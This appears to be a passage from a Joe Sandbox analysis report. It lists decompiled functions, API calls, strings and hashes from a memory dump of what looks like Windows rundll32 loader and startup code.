CreateActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(00000020,?,?), ref: 010059AE
CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 010059F4
CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 01005A15
CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 01005A32
GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?), ref: 01005A60
CreateActCtxWWorker.KERNEL32(?,?,?), ref: 01005A7D
ActivateActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(?,00000000,?,?), ref: 01005A8E
memset.MSVCRT ref: 01005B47
CompareStringW.API-MS-WIN-CORE-STRING-L1-1-0(0000007F,00000001,?,000000FF,IME,000000FF), ref: 01005B77

Strings

, xrefs: 0100595A
, xrefs: 01005A73
.manifest, xrefs: 01005985
N, xrefs: 01005AD9
IME, xrefs: 01005B65
|, xrefs: 01005A0A

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: Create$Worker$Path$Search$ActivateAttributesCompareFileHandleModeModuleRelativeStringmemset
String ID: $ $.manifest$IME$N$|
API String ID: 2530136470-3161873098
Opcode ID: e51b94b0df2bb066c4888ce649ea4a62ef31ce39ce17072a8ff91373080d3fa9
Instruction ID: 6a676c6c4016271ff67dda084a91dde0b3c6764c789bcbe2fc634690e720c970
Opcode Fuzzy Hash: e51b94b0df2bb066c4888ce649ea4a62ef31ce39ce17072a8ff91373080d3fa9
Instruction Fuzzy Hash: 4091B671A00219AFEB32DF64DC8CFEA77B8AB45320F104295F999E21C1DB799944CF61

Uniqueness

Uniqueness Score: -1.00%

Function 01003938 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 107
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E01003938(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				short _v540;
				char _v541;
				char _v548;
				short _v552;
				struct _PROCESS_INFORMATION _v568;
				struct _STARTUPINFOW _v644;
				void* __edi;
				void* __esi;
				long _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				void* _t27;
				char* _t28;
				int _t29;
				WCHAR* _t30;
				int _t37;
				long _t38;
				void* _t43;
				void* _t47;
				int _t50;
				signed int _t51;

				_t47 = __edx;
				_t43 = __ebx;
				_v8 =  *0x1008018 ^ _t51;
				_t22 = E0100387E(__ecx); // executed
				_t49 = _t22;
				if(_t49 == 0) {
					L7:
					_t23 = 0;
				} else {
					_t27 = GetCurrentProcess();
					__imp__IsWow64Process2(_t27,  &_v552,  &_v548);
					if(_t27 == 0) {
						goto L7;
					} else {
						if(_v548 != _t49) {
							_t28 =  &_v541;
							__imp__RtlWow64IsWowGuestMachineSupported(_t49, _t28);
							if(_t28 < 0 || _v541 == 0) {
								goto L7;
							} else {
								_t29 =  &_v540;
								__imp__GetSystemWow64Directory2W(_t29, 0xf6, _t49);
								goto L5;
							}
						} else {
							if(_v552 == 0) {
								goto L7;
							} else {
								_t29 = GetSystemDirectoryW( &_v540, 0xf6);
								L5:
								if(_t29 == 0) {
									goto L7;
								} else {
									_t30 =  &_v540;
									__imp__PathCchAppend(_t30, 0x105, L"rundll32.exe");
									if(_t30 >= 0) {
										__imp__Wow64EnableWow64FsRedirection(0);
										_t50 = 0x44;
										memset( &_v644, 0, _t50);
										_v644.cb = _t50;
										_t37 = CreateProcessW( &_v540, GetCommandLineW(), 0, 0, 0, 0, 0, 0,  &_v644,  &_v568);
										_t49 = _t37;
										__imp__Wow64EnableWow64FsRedirection(1);
										if(_t37 == 0) {
											goto L7;
										} else {
											_t38 = WaitForSingleObject(_v568.hProcess, 0xffffffff);
											_t49 = _t38;
											CloseHandle(_v568);
											CloseHandle(_v568.hThread);
											if(_t38 != 0) {
												goto L7;
											} else {
												_t23 = 1;
											}
										}
									} else {
										goto L7;
									}
								}
							}
						}
					}
				}
				return E01006160(_t23, _t43, _v8 ^ _t51, _t47, 0, _t49);
			}

0x01003938
0x01003938
0x0100394a
0x0100394f
0x01003954
0x01003958
0x010039bd
0x010039bd
0x0100395a
0x01003968
0x0100396f
0x01003977
0x00000000
0x01003979
0x01003980
0x010039cf
0x010039d7
0x010039df
0x00000000
0x010039ea
0x010039f0
0x010039f7
0x00000000
0x010039f7
0x01003982
0x0100398a
0x00000000
0x0100398c
0x01003998
0x0100399e
0x010039a0
0x00000000
0x010039a2
0x010039ac
0x010039b3
0x010039bb
0x01003a02
0x01003a0a
0x01003a14
0x01003a1c
0x01003a44
0x01003a4c
0x01003a4e
0x01003a56
0x00000000
0x01003a5c
0x01003a64
0x01003a70
0x01003a72
0x01003a7e
0x01003a86
0x00000000
0x01003a8c
0x01003a8e
0x01003a8e
0x01003a86
0x00000000
0x00000000
0x00000000
0x010039bb
0x010039a0
0x0100398a
0x01003980
0x01003977
0x010039ce

APIs

Part of subcall function 0100387E: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010038A8
Part of subcall function 0100387E: memset.MSVCRT ref: 010038BC
Part of subcall function 0100387E: ReadFile.KERNELBASE(00000000,?,00000040,?,00000000,00000000), ref: 010038D3
Part of subcall function 0100387E: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000), ref: 010038EE
Part of subcall function 0100387E: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,000000F8,?,00000000), ref: 0100390E
Part of subcall function 0100387E: FindCloseChangeNotification.KERNELBASE(00000000), ref: 01003920

GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 01003968
IsWow64Process2.API-MS-WIN-CORE-WOW64-L1-1-1(00000000), ref: 0100396F
GetSystemDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,000000F6), ref: 01003998
PathCchAppend.API-MS-WIN-CORE-PATH-L1-1-0(?,00000105,rundll32.exe), ref: 010039B3
RtlWow64IsWowGuestMachineSupported.NTDLL ref: 010039D7
GetSystemWow64Directory2W.API-MS-WIN-CORE-WOW64-L1-1-1(?,000000F6,00000000), ref: 010039F7
Wow64EnableWow64FsRedirection.API-MS-WIN-CORE-KERNEL32-PRIVATE-L1-1-0(00000000), ref: 01003A02
memset.MSVCRT ref: 01003A14
GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 01003A36
CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000), ref: 01003A44
Wow64EnableWow64FsRedirection.API-MS-WIN-CORE-KERNEL32-PRIVATE-L1-1-0(00000001), ref: 01003A4E
WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF), ref: 01003A64
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 01003A72
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 01003A7E

Strings

rundll32.exe, xrefs: 010039A2

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: Wow64$File$Close$CreateEnableHandleProcessReadRedirectionSystemmemset$AppendChangeCommandCurrentDirectoryDirectory2FindGuestLineMachineNotificationObjectPathPointerProcess2SingleSupportedWait
String ID: rundll32.exe
API String ID: 191792154-3034741169
Opcode ID: 0a048136ca3c3c0b5b1bcc2f3802f8f2dd588414e41edcc7404f4f81e7ddf925
Instruction ID: 6235e5bc667b77c3f2729bfa017ad5f4412b29bb946fa9707e06cdcf288c3302
Opcode Fuzzy Hash: 0a048136ca3c3c0b5b1bcc2f3802f8f2dd588414e41edcc7404f4f81e7ddf925
Instruction Fuzzy Hash: 65317372901119AFEB739B649D4CBEB7BBCBB04704F0401E9F589D6085DB399A84CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0100371B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 117
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E0100371B(struct HINSTANCE__* __ecx, int __edx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				void _v408;
				void _v1328;
				long _v1332;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t31;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t45;
				intOrPtr* _t48;
				void* _t52;
				void* _t53;
				void* _t54;
				signed int _t57;

				_t51 = __edx;
				_v8 =  *0x1008018 ^ _t57;
				_t41 = _a8;
				_t53 = _a4;
				_t54 = __ecx;
				_t24 = LoadStringW(__ecx, __edx,  &_v408, 0xc8); // executed
				if(_t24 == 0) {
					L12:
					return E01006160(_t24, _t41, _v8 ^ _t57, _t51, _t53, _t54);
				}
				_push(_t41);
				if(E01001F2B( &_v1328, 0x1cc,  &_v408, _t53) >= 0 && LoadStringW(_t54, 0x402,  &_v408, 0xc8) != 0) {
					_t24 =  *0x10083c8;
					if(_t24 != 1) {
						if(_t24 == 0) {
							_t24 =  *0x100b024(0,  &_v1328,  &_v408, 0x10);
						}
						goto L12;
					}
					_t53 = 0;
					_t24 = CreateFileW(L"CONOUT$", 0xc0000000, 3, 0, 3, 0, 0);
					_t8 = _t24 + 1; // 0x1
					asm("sbb esi, esi");
					_t54 =  ~_t8 & _t24;
					if(_t54 == 0) {
						goto L12;
					}
					_t45 =  &_v408;
					_t52 = _t45 + 2;
					do {
						_t31 =  *_t45;
						_t45 = _t45 + 2;
					} while (_t31 != 0);
					WriteConsoleW(_t54,  &_v408, _t45 - _t52 >> 1,  &_v1332, 0);
					WriteConsoleW(_t54, L": ", 2,  &_v1332, 0);
					_t48 =  &_v1328;
					_t51 = _t48 + 2;
					do {
						_t37 =  *_t48;
						_t48 = _t48 + 2;
					} while (_t37 != 0);
					WriteConsoleW(_t54,  &_v1328, _t48 - _t51 >> 1,  &_v1332, 0);
					_t24 = CloseHandle(_t54);
				}
			}

0x0100371b
0x0100372d
0x01003731
0x0100373c
0x0100373f
0x01003749
0x01003751
0x0100386b
0x0100387b
0x0100387b
0x01003757
0x01003776
0x0100379c
0x010037a4
0x01003851
0x01003865
0x01003865
0x00000000
0x01003851
0x010037aa
0x010037bd
0x010037c3
0x010037c8
0x010037ca
0x010037cc
0x00000000
0x00000000
0x010037d2
0x010037d8
0x010037db
0x010037db
0x010037de
0x010037e1
0x010037fb
0x01003811
0x01003817
0x0100381d
0x01003820
0x01003820
0x01003823
0x01003826
0x01003840
0x01003847
0x01003847

APIs

LoadStringW.USER32(?,?,?,000000C8), ref: 01003749
LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000402,?,000000C8,?,000000C8), ref: 0100378E
CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(CONOUT$,C0000000,00000003,00000000,00000003,00000000,00000000,?,00000402,?,000000C8,?,000000C8), ref: 010037BD
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,?,?,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 010037FB
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,010017E8,00000002,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 01003811
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,?,?,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 01003840
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000001,?,00000402,?,000000C8,?,000000C8), ref: 01003847

Strings

CONOUT$, xrefs: 010037B8

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: ConsoleWrite$LoadString$CloseCreateFileHandle
String ID: CONOUT$
API String ID: 258192622-3130406586
Opcode ID: 98b3b9c30c04b4ae64b795a7057a589ac13177da3931083420793058fe33967a
Instruction ID: bf45d509a0c28d4d7935de68a34d323543a351570599adae53039b6c2d5cf3da
Opcode Fuzzy Hash: 98b3b9c30c04b4ae64b795a7057a589ac13177da3931083420793058fe33967a
Instruction Fuzzy Hash: 0831B0715006196FEB22DB65CC59EEB77BCEF45705F0080D9FA89E6081D6319B458F60

Uniqueness

Uniqueness Score: -1.00%

Function 01005F35 Relevance: 10.6, APIs: 7, Instructions: 132
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E01005F35() {
				int _t26;
				signed int _t35;
				void* _t36;
				intOrPtr _t38;
				signed short* _t39;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				void* _t52;
				intOrPtr _t53;
				void* _t57;

				_push(0x5c);
				_push(0x1006c88);
				E0100683C(_t36, _t50, _t52);
				 *(_t57 - 0x20) = 0;
				GetStartupInfoW(_t57 - 0x6c);
				 *((intOrPtr*)(_t57 - 4)) = 0;
				_t53 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t51 = 0;
				while(1) {
					_t38 = _t53;
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t53) {
						Sleep(0x3e8);
						continue;
					} else {
						_t55 = 1;
						_t51 = 1;
					}
					L6:
					if( *0x10084e8 != _t55) {
						__eflags =  *0x10084e8;
						if(__eflags != 0) {
							 *0x1008034 = _t55;
							goto L12;
						} else {
							 *0x10084e8 = _t55;
							_t35 = E01006106(_t38, 0x10011f8, 0x1001204); // executed
							__eflags = _t35;
							if(__eflags == 0) {
								goto L12;
							} else {
								goto L10;
							}
						}
					} else {
						_push(0x1f);
						L01006634();
						L12:
						if( *0x10084e8 == _t55) {
							_push(0x10011f4);
							_push(0x10011d8); // executed
							L01006836(); // executed
							 *0x10084e8 = 2;
						}
						if(_t51 == 0) {
							 *0x10084e4 = 0;
						}
						_t65 =  *0x10084f4;
						if( *0x10084f4 != 0 && E01006690(_t65, 0x10084f4) != 0) {
							_t55 =  *0x10084f4;
							 *0x1009294(0, 2, 0);
							 *( *0x10084f4)();
						}
						_t39 =  *__imp___wcmdln;
						if(_t39 == 0) {
							L10:
							 *((intOrPtr*)(_t57 - 4)) = 0xfffffffe;
						} else {
							 *(_t57 - 0x24) = _t39;
							_t55 = 0x20;
							_t49 =  *(_t57 - 0x20);
							while(1) {
								_t26 =  *_t39 & 0x0000ffff;
								if(_t26 > _t55) {
									goto L32;
								}
								if(_t26 != 0) {
									if(_t49 != 0) {
										goto L32;
									} else {
										while(_t26 != 0 && _t26 <= _t55) {
											_t39 =  &(_t39[1]);
											 *(_t57 - 0x24) = _t39;
											_t26 =  *_t39 & 0x0000ffff;
										}
									}
								}
								__eflags =  *(_t57 - 0x40) & 0x00000001;
								if(( *(_t57 - 0x40) & 0x00000001) == 0) {
									_t26 = 0xa;
								} else {
									_t26 =  *(_t57 - 0x3c) & 0x0000ffff;
								}
								E01003F9E(0x1000000, 0, _t39, _t26); // executed
								 *0x1008030 = _t26;
								__eflags =  *0x1008048;
								if( *0x1008048 == 0) {
									exit(_t26);
									goto L32;
								}
								__eflags =  *0x1008034;
								if( *0x1008034 == 0) {
									__imp___cexit();
								}
								 *((intOrPtr*)(_t57 - 4)) = 0xfffffffe;
								goto L38;
								L32:
								__eflags = _t26 - 0x22;
								if(_t26 == 0x22) {
									__eflags = _t49;
									_t15 = _t49 == 0;
									__eflags = _t15;
									_t49 = 0 | _t15;
									 *(_t57 - 0x20) = _t49;
								}
								_t39 =  &(_t39[1]);
								 *(_t57 - 0x24) = _t39;
							}
						}
					}
					L38:
					return E01006884(0, _t51, _t55);
				}
				_t55 = 1;
				__eflags = 1;
				goto L6;
			}

0x01005f35
0x01005f37
0x01005f3c
0x01005f43
0x01005f4a
0x01005f50
0x01005f59
0x01005f5c
0x01005f5e
0x01005f63
0x01005f67
0x01005f6d
0x00000000
0x00000000
0x01005f71
0x01005f7f
0x00000000
0x01005f73
0x01005f75
0x01005f76
0x01005f76
0x01005f8a
0x01005f90
0x01005f9c
0x01005fa2
0x01005fd0
0x00000000
0x01005fa4
0x01005fa4
0x01005fb4
0x01005fbb
0x01005fbd
0x00000000
0x00000000
0x00000000
0x00000000
0x01005fbd
0x01005f92
0x01005f92
0x01005f94
0x01005fd6
0x01005fdc
0x01005fde
0x01005fe3
0x01005fe8
0x01005fef
0x01005fef
0x01005ffb
0x01006004
0x01006004
0x01006006
0x0100600d
0x01006022
0x0100602a
0x01006030
0x01006030
0x01006037
0x0100603b
0x01005fbf
0x01005fbf
0x0100603d
0x0100603d
0x01006042
0x01006043
0x01006046
0x01006046
0x0100604c
0x00000000
0x00000000
0x01006051
0x01006055
0x00000000
0x00000000
0x01006057
0x01006061
0x01006064
0x01006067
0x01006067
0x01006057
0x01006055
0x0100606c
0x01006070
0x0100607a
0x01006072
0x01006072
0x01006072
0x01006083
0x01006088
0x0100608d
0x01006094
0x01006097
0x00000000
0x01006097
0x010060e5
0x010060ec
0x010060ee
0x010060f4
0x010060f9
0x00000000
0x0100609d
0x0100609d
0x010060a0
0x010060a4
0x010060a6
0x010060a6
0x010060a9
0x010060ab
0x010060ab
0x010060ae
0x010060b1
0x010060b1
0x01006046
0x0100603b
0x01006100
0x01006105
0x01006105
0x01005f89
0x01005f89
0x00000000

APIs

GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,01006C88,0000005C), ref: 01005F4A
Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8), ref: 01005F7F
_amsg_exit.MSVCRT ref: 01005F94
_initterm.MSVCRT ref: 01005FE8
__IsNonwritableInCurrentImage.LIBCMT ref: 01006014
exit.MSVCRT ref: 01006097

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_inittermexit
String ID:
API String ID: 2849151604-0
Opcode ID: 76fd6939bf0d39afb199973e70663e7134e933e85e92b8636355c4d1440d070d
Instruction ID: bf83d7c0746f1dc0d20ad22f233b77de0c69c33b39bbd52f893ad4bd41621138
Opcode Fuzzy Hash: 76fd6939bf0d39afb199973e70663e7134e933e85e92b8636355c4d1440d070d
Instruction Fuzzy Hash: A2419F70A803128AFBB7DB58D9447BA76F6BB04750F10406EF5C19A2C5DF7A8990CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0100387E Relevance: 9.1, APIs: 6, Instructions: 69
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0100387E(WCHAR* __ecx) {
				signed int _v8;
				long _v16;
				void _v76;
				signed short _v320;
				void _v324;
				long _v328;
				void* __edi;
				void* __esi;
				void* _t13;
				int _t20;
				void* _t27;
				void* _t31;
				void* _t32;
				signed int _t33;
				signed int _t34;

				_v8 =  *0x1008018 ^ _t34;
				_t33 = 0;
				_t13 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t32 = _t13;
				if(_t32 != 0xffffffff) {
					memset( &_v76, 0, 0x40);
					_t20 = ReadFile(_t32,  &_v76, 0x40,  &_v328, 0); // executed
					if(_t20 != 0 && 0x5a4d == _v76 && SetFilePointer(_t32, _v16, 0, 0) != 0xffffffff && ReadFile(_t32,  &_v324, 0xf8,  &_v328, 0) != 0) {
						_t33 = _v320 & 0x0000ffff;
					}
					FindCloseChangeNotification(_t32); // executed
				}
				return E01006160(_t33, _t27, _v8 ^ _t34, _t31, _t32, _t33);
			}

0x01003890
0x01003895
0x010038a8
0x010038ae
0x010038b3
0x010038bc
0x010038d3
0x010038db
0x01003918
0x01003918
0x01003920
0x01003920
0x01003937

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010038A8
memset.MSVCRT ref: 010038BC
ReadFile.KERNELBASE(00000000,?,00000040,?,00000000,00000000), ref: 010038D3
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000), ref: 010038EE
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,000000F8,?,00000000), ref: 0100390E
FindCloseChangeNotification.KERNELBASE(00000000), ref: 01003920

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: File$Read$ChangeCloseCreateFindNotificationPointermemset
String ID:
API String ID: 2065208610-0
Opcode ID: 5703583428f5889b3a3983bb86e6b1413ffa0021b2bfc9708df0585255f52e35
Instruction ID: 2b5c61b0b58d74cdebe9959ae639648e000be6b9251836c2c379e1b882465856
Opcode Fuzzy Hash: 5703583428f5889b3a3983bb86e6b1413ffa0021b2bfc9708df0585255f52e35
Instruction Fuzzy Hash: 59118171600128BAEB329B659C48FFF7EBCEB45760F000254FA8DE61C4DA358A45C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 01003C8D Relevance: 6.1, APIs: 4, Instructions: 109
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01003C8D(int __edx, void* __eflags, short* _a4, short* _a8, intOrPtr* _a12, intOrPtr* _a16, char** _a20) {
				int _v8;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				int _v20;
				intOrPtr _v24;
				struct HINSTANCE__* _t29;
				intOrPtr _t31;
				short _t37;
				int _t38;
				long _t39;
				int _t45;
				short* _t57;
				int _t64;
				short* _t65;
				short* _t67;
				char* _t70;
				short* _t72;

				_v12 =  *0x10083cc;
				_t72 = _a8;
				_t45 = 0;
				 *_a12 = 0;
				_t67 = _a4;
				_v20 = __edx;
				 *_a16 = 0;
				 *_a20 = 0;
				_t29 = E01003A94(_v12, __edx); // executed
				_v16 = _t29;
				if(_t29 != 0) {
					_v8 = 0;
					_t31 = E01003B92(_t29, _t67,  &_v8);
					_v24 = _t31;
					if(_t31 == 0) {
						_t72 = _v20;
						_t64 = 0x400;
						goto L12;
					} else {
						_t45 = 1;
						if(_v8 == 0 || _t72 == 0 ||  *_t72 == 0) {
							L9:
							 *_a12 = _v16;
							 *_a16 = _v24;
						} else {
							_t57 = _t72;
							_t65 =  &(_t57[1]);
							do {
								_t37 =  *_t57;
								_t57 =  &(_t57[1]);
							} while (_t37 != 0);
							_t38 = (_t57 - _t65 >> 1) + 1;
							_v20 = _t38;
							_t39 = WideCharToMultiByte(0, 0x400, _t72, _t38, 0, 0, 0, 0);
							_v8 = _t39;
							_t70 = LocalAlloc(0, _t39);
							if(_t70 == 0) {
								_t45 = 0;
								_t64 = 0x300;
								_t67 = 0;
								L12:
								E0100371B(_v12, _t64, _t72, _t67);
								FreeLibrary(_v16);
							} else {
								WideCharToMultiByte(0, 0x400, _t72, _v20, _t70, _v8, 0, 0);
								 *_a20 = _t70;
								goto L9;
							}
						}
					}
				}
				return _t45;
			}

0x01003c9d
0x01003ca7
0x01003caa
0x01003cac
0x01003cb2
0x01003cb5
0x01003cb8
0x01003cbd
0x01003cc4
0x01003cc9
0x01003cce
0x01003cd7
0x01003cdf
0x01003ce4
0x01003ce9
0x01003d78
0x01003d7b
0x00000000
0x01003cef
0x01003cef
0x01003cf4
0x01003d5b
0x01003d61
0x01003d69
0x01003d01
0x01003d01
0x01003d03
0x01003d06
0x01003d06
0x01003d09
0x01003d0c
0x01003d19
0x01003d24
0x01003d27
0x01003d2f
0x01003d38
0x01003d3c
0x01003d6d
0x01003d6f
0x01003d74
0x01003d80
0x01003d85
0x01003d8e
0x01003d3e
0x01003d50
0x01003d59
0x00000000
0x01003d59
0x01003d3c
0x01003cf4
0x01003ce9
0x01003d9c

APIs

Part of subcall function 01003A94: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 01003AB5
Part of subcall function 01003A94: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000008), ref: 01003AC1

Part of subcall function 01003B92: _wtoi.MSVCRT ref: 01003BC4
Part of subcall function 01003B92: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?), ref: 01003BD0

WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,00000000,00000000,00000000), ref: 01003D27
LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000), ref: 01003D32
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,00000000,00000000,00000000), ref: 01003D50
FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?), ref: 01003D8E

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: ByteCharLibraryMultiWide$AddressAllocErrorFreeLastLoadLocalProc_wtoi
String ID:
API String ID: 1343397253-0
Opcode ID: e0590d9fca42e9e70dd166b355f79ee23e1093aac47e9358335007bb6207facb
Instruction ID: 71a192355b5717c5eb758b3773fad1e0e7639b613b4828d7778c50113455e389
Opcode Fuzzy Hash: e0590d9fca42e9e70dd166b355f79ee23e1093aac47e9358335007bb6207facb
Instruction Fuzzy Hash: 6C315075A00605AFEB16DFA9D8449AFBBF9FF89204F14805AE9459B390D7319D02CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01005F00 Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wgetmainargs.KERNELBASE ref: 01005F24

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: __wgetmainargs
String ID:
API String ID: 1709950718-0
Opcode ID: ab3fe4c18390c0d1ac7c26029ddad7f41789e98ee5b6edb6295fabd710127309
Instruction ID: 309741b441ededea4a76034fa0baa4d3d25f720510ebe9676381fa1ba714008e
Opcode Fuzzy Hash: ab3fe4c18390c0d1ac7c26029ddad7f41789e98ee5b6edb6295fabd710127309
Instruction Fuzzy Hash: D0D0C9F0EC2700EBF6F3DB26A8069013B60B344A44F00E06BB7C4A915AD27F81108B15

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01006783 Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01006783() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x1008018;
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
